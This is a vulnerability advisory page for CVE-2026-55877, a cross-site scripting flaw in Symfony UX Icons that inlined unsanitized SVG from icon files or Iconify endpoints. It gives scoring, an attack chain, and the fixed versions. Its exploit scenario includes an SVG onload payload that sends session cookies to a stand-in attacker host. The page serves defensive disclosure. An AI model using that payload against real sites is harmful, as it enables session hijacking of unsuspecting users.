Skip to main content

Symfony UX Icons CVE-2026-55877

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-19 https://github.com/symfony/ux GHSA-6v8j-33hc-mv84
6.1
CVSS 3.1 · Vendor: https://github.com/symfony/ux
Share

Severity by source

Vendor (https://github.com/symfony/ux) PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
6.1 MEDIUM

Iconify path is network-reachable with no auth required; victim must load the page (UI:R); SVG inline execution crosses to browser origin (S:C); no availability impact.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (https://github.com/symfony/ux).

CVSS VectorVendor: https://github.com/symfony/ux

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 19, 2026 - 23:49 vuln.today
Analysis Generated
Jun 19, 2026 - 23:49 vuln.today

DescriptionCVE.org

Description

The ux_icon() Twig function is marked is_safe=['html'], so Twig never escapes its output. Icon::toHtml() inlines the SVG source verbatim into the page. Browsers execute <script> elements and on* event-handler attributes found inside inline SVG, making any unsanitized icon a vector for cross-site scripting.

Two code paths were affected. In the local file path, Icon::fromFile() only stripped <script> elements that were direct children of <svg>, leaving nested scripts and all on* attributes untouched despite a code comment claiming broader protection. In the Iconify on-demand path (enabled by default), the remote JSON body field was wrapped into an Icon object with no sanitization at all. Concrete attack vectors include a malicious SVG icon pack from a third-party theme or downloaded icon set, or a controlled Iconify endpoint configured via iconify.endpoint (including a poisoned cache).

Resolution

Introducing an IconFactory that centralizes sanitization across every icon source before an Icon object is created. The sanitizer removes script-capable elements (script, foreignObject, iframe, object, embed), SMIL animations targeting on*, href, or xlink:href attributes, CDATA sections, processing instructions, all on* attributes, and javascript:, vbscript:, and data:text/html URL schemes. <style> elements are kept for theming but have any handlers stripped. Icons that contain none of these constructs are byte-for-byte identical after sanitization.

Credits

Symfony would like to thank Pascal Cescon for reporting the issue and Hugo Alliaume for providing the fix.

AnalysisAI

Cross-site scripting in Symfony UX Icons (symfony/ux-icons) allows an attacker who controls SVG icon content - via a malicious third-party icon pack, a downloaded icon set, or a tampered Iconify on-demand endpoint - to inject and execute arbitrary JavaScript in the browsers of users who load any page rendering those icons. Two distinct sanitization failures existed: the local-file path in Icon::fromFile() only stripped top-level <script> children of <svg>, ignoring nested scripts and all on* event-handler attributes, while the Iconify on-demand path (enabled by default) applied zero sanitization to the remote JSON body field before inlining it as HTML. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker poisons Iconify endpoint or icon file
Delivery
Malicious SVG body with on* handler or nested script embedded
Exploit
Application fetches icon with no sanitization
Install
ux_icon() inlines raw SVG into page HTML
C2
Victim user loads page in browser
Execute
Browser executes injected JavaScript in application origin
Impact
Attacker harvests session tokens or performs authenticated actions

Vulnerability AssessmentAI

Exploitation Two distinct attack paths exist with different preconditions. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD-assigned CVSS 3.1 score of 6.1 with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N is well-calibrated for the Iconify on-demand path: the attack reaches the vulnerable application over the network, requires no authentication to the application itself, is low-complexity, and achieves a scope change into the victim's browser context. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker compromises or spoofs the configured Iconify endpoint (or poisons a CDN cache serving icon JSON), injecting an SVG body containing an `<svg onload="document.location='https://attacker.example/steal?c='+document.cookie">` payload. When any authenticated user navigates to a page that calls `ux_icon()` with that icon name, the browser inlines the SVG verbatim and fires the `onload` handler, exfiltrating the user's session cookie to the attacker's server. …
Remediation Upgrade symfony/ux-icons to version 2.36.1 (for the 2.x branch) or 3.2.0 (for the 3.x branch); both versions introduce the new `IconFactory` class that centralizes sanitization for every icon source before an `Icon` object is constructed. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-55877 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy